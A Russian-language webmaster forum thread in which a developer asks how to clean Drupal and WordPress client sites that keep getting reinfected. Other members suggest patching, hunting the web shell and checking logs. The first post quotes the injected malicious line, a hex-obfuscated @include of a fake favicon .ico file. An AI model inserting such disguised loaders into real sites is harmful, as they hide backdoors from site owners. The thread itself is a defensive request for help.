Взлом сайта

12 3
katenuha
На сайте с 13.06.2013
Offline
90
3087

Приветствую. Столкнулся с такой проблемой.

Уже на 2х сайтах, которые никак друг с другом не связаны, нахожу вредоносные вставки и файлы. Сайты клиентские. Т.е приходит сайт в работу (продвижение/доработки, а там уже понапихано всякой дряни)

В чем суть:

на фтп создаются рандомные файлы иногда с названиями вида sdfs.php, иногда index.php в рандомных папках и в хаотичном порядке. Рандомное количество в день. Также добавляются вставки кода в основные файлы движка.

В файле index.php в корне, например, вот такое


/*ea20a*/

@include "\x2fh\x6fm\x65/\x6fk\x6eo\x73t\x72/\x77w\x77/\x73i\x74e\x32/\x70u\x62l\x69c\x5fh\x74m\x6c/\x6do\x64u\x6ce\x73/\x73y\x73t\x65m\x2ft\x65s\x74s\x2ff\x61v\x69c\x6fn\x5f4\x36c\x379\x30.\x69c\x6f";

/*ea20a*/

первый сайт на drupal, второй на wordpress.

Айболит не помогает. Им прогоняли, чистили все, что он нашел, на следующий день снова куча файлов и вставок.

С вордпресс проблему решили, поставили чистый движок и перекинули шаблон предварительно его проверив. (из модулей не ставили ничего). С друпалом все сложнее и займет очень много времени установка чистого и настройка модулей и всего сайта.

Кто-нибудь сталкивался? Самая бяка в том, что это все рассылает спам с сервера и некоторые хостеры могут заблочить функцию отправки письма, как было с сайтом на вордпресс (в итоге клиент ушел после полу года работы с отличными результатами из-за того, что не поверил, что вся эта вирусня появилась еще до работы с нами)

Кроме спама иногда на сайте появляется реклама (баннеры) не всплывающие, а между блоками сайта, аккуратно вставленная. После обновления страницы пропадает.

Буду благодарен за любой совет

---------- Добавлено 27.04.2018 в 11:28 ----------

Еще подметил. Если почистить файл от вставки, а на следующий день посмотреть - там снова она есть, но дата изменения файла не менялась.

Адаптирую Ваш сайт под мобильные устройства. (/ru/forum/946260) за 1 день.
SeVlad
На сайте с 03.11.2008
Offline
1413
#1
katenuha:
первый сайт на drupal, второй на wordpress.

Надо бы указывать версии.

В Друпале за последнее время обнаружено 2 критичных уязвимости. Как минимум одну может заюзать любой начинающий кулцхакер. Фиксы кажется вышли - надо фиксить.

В ВП, если используются темы/плагины с помоек/древние/самописьки, тоже в них могут быть дыры.

Если сайты не изолированы, то дыра на одном позволяет добраться до всех.

katenuha:
Если почистить файл от вставки, а на следующий день посмотреть - там снова она есть, но дата изменения файла не менялась

шелл не удалён, работает.

Делаю хорошие сайты хорошим людям. Предпочтение коммерческим направлениям. Топики помощи с ⓌordPress (https://searchengines.guru/ru/forum/1032910 ) и основы безопасности сайтов ( https://searchengines.guru/ru/forum/774117 ). *** Помощь\консультации в топиках форума - БЕСПЛАТНО. Платные услуги ( https://wp.me/P3YHjQ-3 ) - с бюджетом от 150$ ***
katenuha
На сайте с 13.06.2013
Offline
90
#2
SeVlad:
Надо бы указывать версии.
В Друпале за последнее время обнаружено 2 критичных уязвимости. Как минимум одну может заюзать любой начинающий кулцхакер. Фиксы кажется вышли - надо фиксить.

В ВП, если используются темы/плагины с помоек/древние/самописьки, тоже в них могут быть дыры.

Если сайты не изолированы, то дыра на одном позволяет добраться до всех.


шелл не удалён, работает.

wordpress был последний

друпал 7

плагины особо не юзались на вп кроме all in seo pack

сайты изолированы

SeVlad
На сайте с 03.11.2008
Offline
1413
#3
katenuha:
сайты изолированы

Это вряд ли, если одинаковая зараза на всех.

katenuha:
плагины особо не юзались на вп кроме all in seo pack

Достаточно одной помоешной/древней/самописной темы.

katenuha
На сайте с 13.06.2013
Offline
90
#4
SeVlad:
Это вряд ли, если одинаковая зараза на всех.

ну как вряд ли. Хостинги разные. Один клиент пришел в ноябре еще. Файлы с таким кодом у него были еще с 16 года. Второй клиент пришел в феврале 18 года. Первые файлы с этой фигней датированы июлем 2017.

SeVlad:
Достаточно одной помоешной/древней/самописной темы.

Зараза появилась не при нас. Вопрос что это и как почистить.

Апокалипсис
На сайте с 02.11.2008
Offline
391
#5

Логи смотрите. Вообще все это только ручками делается. Айболит лишь может намекнуть или найти популярный вирус.

Записки нищего (http://zapiskinishego.ru) - мой личный блог Услуги php программиста. Очень нужна любая работа. Не покупают? Поведенческий аудит интернет-магазина за 5000 руб. (/ru/forum/990312)
SeVlad
На сайте с 03.11.2008
Offline
1413
#6
katenuha:
Хостинги разные.

А, ну если так (из стартоста этого не особо видно), тогда да, изолированы.

katenuha:
Вопрос что это и как почистить.

Тогда разбираться отдельно с каждым сайтом.

1. Пофиксить дыру в друпале (на друпал.орг поищи фикс)

2. Найти-удалить шелл. Айболит в параноидальном режиме в помощь (но это не панацея).

В ВП, если что, можно сравнить файлы ядра с оригинальными с пом плага https://ru.wordpress.org/plugins/health-check/

WebAlt
На сайте с 02.12.2007
Offline
215
#7

https://wpvulndb.com/ - дпя Wordpress

https://www.drupal.org/security - дпя Drupal

Промокод на скидку 25%: [ 64821976 ] на сайтах: [ https://firstvds.ru ] - виртуальные серверы; [ https://1dedic.ru ] - выделенные серверы; [ https://ispserver.ru ] - хостинг, VPS/VDS, выделенные и облачные серверы с полным администрированием.
katenuha
На сайте с 13.06.2013
Offline
90
#8
WebAlt:
https://wpvulndb.com/ - дпя Wordpress
https://www.drupal.org/security - дпя Drupal

спасибо, а что с этим делать?)

neoks
На сайте с 17.03.2010
Offline
142
#9

Ставьте логи запросов и смотрите что происходит, сайты будут ломаться пока не закроете дырку.

katenuha
На сайте с 13.06.2013
Offline
90
#10
Апокалипсис:
Логи смотрите. Вообще все это только ручками делается. Айболит лишь может намекнуть или найти популярный вирус.

Нет ничего в логах.. может не шарю, но ничего особенного там нет

---------- Добавлено 03.05.2018 в 11:36 ----------

neoks:
Ставьте логи запросов и смотрите что происходит, сайты будут ломаться пока не закроете дырку.

Есть какие-нибудь конкретные инструкции?

12 3

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий